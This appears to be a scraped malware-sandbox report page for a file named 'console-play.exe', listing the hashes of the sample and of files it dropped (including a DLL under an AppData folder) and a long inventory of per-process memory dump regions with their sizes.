cf79fcf60158a33adb39351b4626e8012e737acf4633b882c75240b21480ac1cc91e811c8b351f6e499b689d15b87054cc185c5d54e8e0d628b8b13bfc3bd877

Download Submit
C:\Users\Admin\Downloads\console-play.exe

MD5
a43be7341e3d13810d20b9e64e329c83

SHA1
ad582a30ba365885be34fe503c744088d08b4baa

SHA256
e2c83783d6ab57ac91d99bfb9d607d0b5537e305661406bbf2347c3af92d3464

SHA512
cf79fcf60158a33adb39351b4626e8012e737acf4633b882c75240b21480ac1cc91e811c8b351f6e499b689d15b87054cc185c5d54e8e0d628b8b13bfc3bd877

Download Submit
\??\pipe\crashpad_4952_ERYALPZFZKUITLID

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\pipe\crashpad_808_TDCTVZCTLTCJEDAX

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Roaming\Bouncy for .NET Helper\qclp.dll

MD5
4240767ecbcecd84f3c90d0ee889460c

SHA1
d390f9e165408864dda6c925dfe6627c557a6b24

SHA256
1d1e59b6a67e1f4ecc8516c384291655d4c51f7f91168e6b593f5f8919bffdc3

SHA512
89fe2e6cc6a1480d8a42efe2b694b3b677967b7656326fcf8453c7f484d92f450be65c6c2639cd08131dbc58e0d34ee696bf1b263227e34d2ac91c4aaa7aee61

Download Submit
memory/492-526-0x000001BB95E50000-0x000001BB95E51000-memory.dmp

Filesize
4KB

Download
memory/492-527-0x000001BB95DB0000-0x000001BB95E50000-memory.dmp

Filesize
640KB

Download
memory/492-122-0x0000000000000000-mapping.dmp

Download
memory/492-577-0x000001BB962C0000-0x000001BB972C0000-memory.dmp

Filesize
16.0MB

Download
memory/736-543-0x000001E3CC160000-0x000001E3CC161000-memory.dmp

Filesize
4KB

Download
memory/736-521-0x000001E3CC850000-0x000001E3CC8F0000-memory.dmp

Filesize
640KB

Download
memory/736-566-0x000001E3CCE40000-0x000001E3CDE40000-memory.dmp

Filesize
16.0MB

Download
memory/736-124-0x00007FFA1CF40000-0x00007FFA1CF41000-memory.dmp

Filesize
4KB

Download
memory/736-121-0x0000000000000000-mapping.dmp

Download
memory/808-542-0x000001A4305E0000-0x000001A4315E0000-memory.dmp

Filesize
16.0MB

Download
memory/808-538-0x000001A42EFD0000-0x000001A42F070000-memory.dmp

Filesize
640KB

Download
memory/808-534-0x000001A42BB90000-0x000001A42BB91000-memory.dmp

Filesize
4KB

Download
memory/1152-150-0x0000000000000000-mapping.dmp

Download
memory/1552-608-0x0000022ED5270000-0x0000022ED5310000-memory.dmp

Filesize
640KB

Download
memory/1552-609-0x0000022ED6210000-0x0000022ED7210000-memory.dmp

Filesize
16.0MB

Download
memory/1552-607-0x0000022ED5310000-0x0000022ED5311000-memory.dmp

Filesize
4KB

Download
memory/1676-428-0x0000000000000000-mapping.dmp

Download
memory/1772-242-0x0000000000000000-mapping.dmp

Download
memory/1772-318-0x0000000000000000-mapping.dmp

Download
memory/1876-116-0x0000000000000000-mapping.dmp

Download
memory/1876-541-0x0000014819BA0000-0x0000014819C40000-memory.dmp

Filesize
640KB

Download
memory/1876-540-0x0000014818050000-0x0000014818051000-memory.dmp

Filesize
4KB

Download
memory/2124-558-0x000002550B2A0000-0x000002550B340000-memory.dmp

Filesize
640KB

Download
memory/2124-559-0x000002550D350000-0x000002550E350000-memory.dmp

Filesize
16.0MB

Download
memory/2124-557-0x000002550B340000-0x000002550B341000-memory.dmp

Filesize
4KB

Download
memory/2648-624-0x000002091A860000-0x000002091A900000-memory.dmp

Filesize
640KB

Download
memory/2648-623-0x000002091A900000-0x000002091A901000-memory.dmp

Filesize
4KB

Download
memory/2648-625-0x000002091B880000-0x000002091C880000-memory.dmp

Filesize
16.0MB

Download
memory/2820-378-0x0000000000000000-mapping.dmp

Download
memory/2844-411-0x0000000000000000-mapping.dmp

Download
memory/3040-147-0x0000000000000000-mapping.dmp

Download
memory/3056-528-0x0000000000F80000-0x0000000000F81000-memory.dmp

Filesize
4KB

Download
memory/3056-531-0x0000000003290000-0x0000000003330000-memory.dmp

Filesize
640KB

Download
memory/3108-157-0x0000000000000000-mapping.dmp

Download
memory/3128-589-0x000001C1D65E0000-0x000001C1D75E0000-memory.dmp

Filesize
16.0MB

Download
memory/3128-588-0x000001C1D5660000-0x000001C1D5700000-memory.dmp

Filesize
640KB

Download
memory/3128-587-0x000001C1D5700000-0x000001C1D5701000-memory.dmp

Filesize
4KB

Download
memory/3244-544-0x000001CA62B30000-0x000001CA62B31000-memory.dmp

Filesize
4KB

Download
memory/3244-545-0x000001CA62D20000-0x000001CA62DC0000-memory.dmp

Filesize
640KB

Download
memory/3252-530-0x000001F8C08A0000-0x000001F8C0940000-memory.dmp

Filesize
640KB

Download
memory/3252-130-0x0000000000000000-mapping.dmp

Download
memory/3252-529-0x000001F8BEAB0000-0x000001F8BEAB1000-memory.dmp

Filesize
4KB

Download
memory/3304-421-0x0000000000000000-mapping.dmp

Download
memory/3596-560-0x0000013300190000-0x0000013300191000-memory.dmp

Filesize
4KB

Download
memory/3596-137-0x0000000000000000-mapping.dmp

Download
memory/3596-561-0x0000013300300000-0x00000133003A0000-memory.dmp

Filesize
640KB

Download
memory/3668-533-0x0000020C70740000-0x0000020C707E0000-memory.dmp

Filesize
640KB

Download
memory/3668-532-0x0000020C706C0000-0x0000020C706C1000-memory.dmp

Filesize
4KB

Download
memory/4012-163-0x0000000000000000-mapping.dmp

Download
memory/4072-562-0x000001C344C40000-0x000001C344C41000-memory.dmp

Filesize
4KB

Download
memory/4072-140-0x0000000000000000-mapping.dmp

Download
memory/4072-563-0x000001C3464E0000-0x000001C346580000-memory.dmp

Filesize
640KB

Download
memory/4100-654-0x000001E313770000-0x000001E313771000-memory.dmp

Filesize
4KB

Download
memory/4100-655-0x000001E3150F0000-0x000001E315190000-memory.dmp

Filesize
640KB

Download
memory/4140-245-0x0000000000000000-mapping.dmp

Download
memory/4148-256-0x0000000000000000-mapping.dmp

Download
memory/4200-680-0x0000020798770000-0x0000020798771000-memory.dmp

Filesize
4KB

Download
memory/4204-365-0x0000000000810000-0x0000000000811000-memory.dmp

Filesize
4KB

Download
memory/4204-348-0x0000000000000000-mapping.dmp

Download
memory/4240-403-0x0000000000000000-mapping.dmp

Download
memory/4240-179-0x0000000000000000-mapping.dmp

Download
memory/4244-388-0x0000000000000000-mapping.dmp

Download
memory/4252-536-0x000001310E520000-0x000001310E5C0000-memory.dmp

Filesize
640KB

Download
memory/4252-535-0x000001310E3E0000-0x000001310E3E1000-memory.dmp

Filesize
4KB

Download
memory/4256-182-0x0000000000000000-mapping.dmp

Download
memory/4264-308-0x0000000000000000-mapping.dmp

Download
memory/4276-260-0x0000000000400000-0x00000000004F6000-memory.dmp

Filesize
984KB

Download
memory/4276-251-0x0000000000000000-mapping.dmp

Download
memory/4280-187-0x0000000000000000-mapping.dmp

Download
memory/4300-313-0x0000000000000000-mapping.dmp

Download
memory/4304-596-0x0000018E45700000-0x0000018E457A0000-memory.dmp

Filesize
640KB

Download
memory/4304-597-0x0000018E00E40000-0x0000018E01E40000-memory.dmp

Filesize
16.0MB

Download
memory/4304-595-0x0000018E457A0000-0x0000018E457A1000-memory.dmp

Filesize
4KB

Download
memory/4364-357-0x0000000000000000-mapping.dmp

Download
memory/4480-331-0x0000000000000000-mapping.dmp

Download
memory/4480-193-0x0000000000000000-mapping.dmp

Download
memory/4492-647-0x000001AFF4A40000-0x000001AFF4A41000-memory.dmp

Filesize
4KB

Download
memory/4492-649-0x000001AFF59B0000-0x000001AFF69B0000-memory.dmp

Filesize
16.0MB

Download
memory/4492-648-0x000001AFF49A0000-0x000001AFF4A40000-memory.dmp

Filesize
640KB

Download
memory/4508-326-0x0000000000000000-mapping.dmp

Download
memory/4524-323-0x0000000000000000-mapping.dmp

Download
memory/4528-261-0x0000000000000000-mapping.dmp

Download
memory/4528-268-0x0000000002780000-0x0000000002781000-memory.dmp

Filesize
4KB

Download
memory/4564-678-0x000001AD78190000-0x000001AD78191000-memory.dmp

Filesize
4KB

Download
memory/4564-679-0x000001AD780F0000-0x000001AD78190000-memory.dmp

Filesize
640KB

Download
memory/4592-657-0x000002881D1D0000-0x000002881D270000-memory.dmp

Filesize
640KB

Download
memory/4592-656-0x000002881D270000-0x000002881D271000-memory.dmp

Filesize
4KB

Download
memory/4596-197-0x0000000000000000-mapping.dmp

Download
memory/4604-264-0x0000000000000000-mapping.dmp

Download
memory/4604-368-0x0000000000000000-mapping.dmp

Download
memory/4620-383-0x0000000000000000-mapping.dmp

Download
memory/4660-202-0x0000000000000000-mapping.dmp

Download
memory/4668-269-0x0000000000000000-mapping.dmp

Download
memory/4684-272-0x0000000000000000-mapping.dmp

Download
memory/4712-207-0x0000000000000000-mapping.dmp

Download
memory/4728-276-0x0000000000000000-mapping.dmp

Download
memory/4736-524-0x0000015968ED0000-0x0000015968F0B000-memory.dmp

Filesize
236KB

Download
memory/4736-495-0x0000015968DD0000-0x0000015968DD1000-memory.dmp

Filesize
4KB

Download
memory/4736-519-0x0000015968356000-0x0000015968358000-memory.dmp

Filesize
8KB

Download
memory/4736-480-0x0000015968350000-0x0000015968352000-memory.dmp

Filesize
8KB

Download
memory/4736-496-0x0000015968E20000-0x0000015968E21000-memory.dmp

Filesize
4KB

Download
memory/4736-481-0x0000015968353000-0x0000015968355000-memory.dmp

Filesize
8KB

Download
memory/4736-485-0x0000015968E50000-0x0000015968E51000-memory.dmp

Filesize
4KB

Download
memory/4736-479-0x0000015968360000-0x0000015968361000-memory.dmp

Filesize
4KB

Download
memory/4760-395-0x0000000000000000-mapping.dmp

Download
memory/4760-281-0x0000000000000000-mapping.dmp

Download
memory/4764-212-0x0000000000000000-mapping.dmp

Download
memory/4776-347-0x0000000000000000-mapping.dmp

Download
memory/4800-416-0x0000000000000000-mapping.dmp

Download
memory/4800-293-0x0000000000000000-mapping.dmp

Download
memory/4816-217-0x0000000000000000-mapping.dmp

Download
memory/4828-338-0x0000000000000000-mapping.dmp

Download
memory/4832-286-0x0000000000000000-mapping.dmp

Download
memory/4844-222-0x0000000000000000-mapping.dmp

Download
memory/4868-399-0x0000000000000000-mapping.dmp

Download
memory/4880-296-0x0000000000000000-mapping.dmp

Download
memory/4892-227-0x0000000000000000-mapping.dmp

Download
memory/4896-362-0x0000000000000000-mapping.dmp

Download
memory/4908-572-0x0000028E92260000-0x0000028E92261000-memory.dmp

Filesize
4KB

Download
memory/4908-574-0x0000028E93200000-0x0000028E94200000-memory.dmp

Filesize
16.0MB

Download
memory/4908-573-0x0000028E921C0000-0x0000028E92260000-memory.dmp

Filesize
640KB

Download
memory/4952-231-0x0000000000000000-mapping.dmp

Download
memory/4964-633-0x000001F0651F0000-0x000001F065290000-memory.dmp

Filesize
640KB

Download
memory/4964-301-0x0000000000000000-mapping.dmp

Download
memory/4964-631-0x000001F065290000-0x000001F065291000-memory.dmp

Filesize
4KB

Download
memory/4964-632-0x000001F0661D0000-0x000001F0671D0000-memory.dmp

Filesize
16.0MB

Download
memory/4976-352-0x0000000000000000-mapping.dmp

Download
memory/5004-234-0x0000000000000000-mapping.dmp

Download
memory/5064-237-0x0000000000000000-mapping.dmp

Download
memory/5068-373-0x0000000000000000-mapping.dmp

Download
memory/5076-345-0x0000000000400000-0x00000000004F6000-memory.dmp

Filesize
984KB

Download
memory/5076-342-0x0000000000000000-mapping.dmp

Download
memory/5104-434-0x0000000000000000-mapping.dmp

Download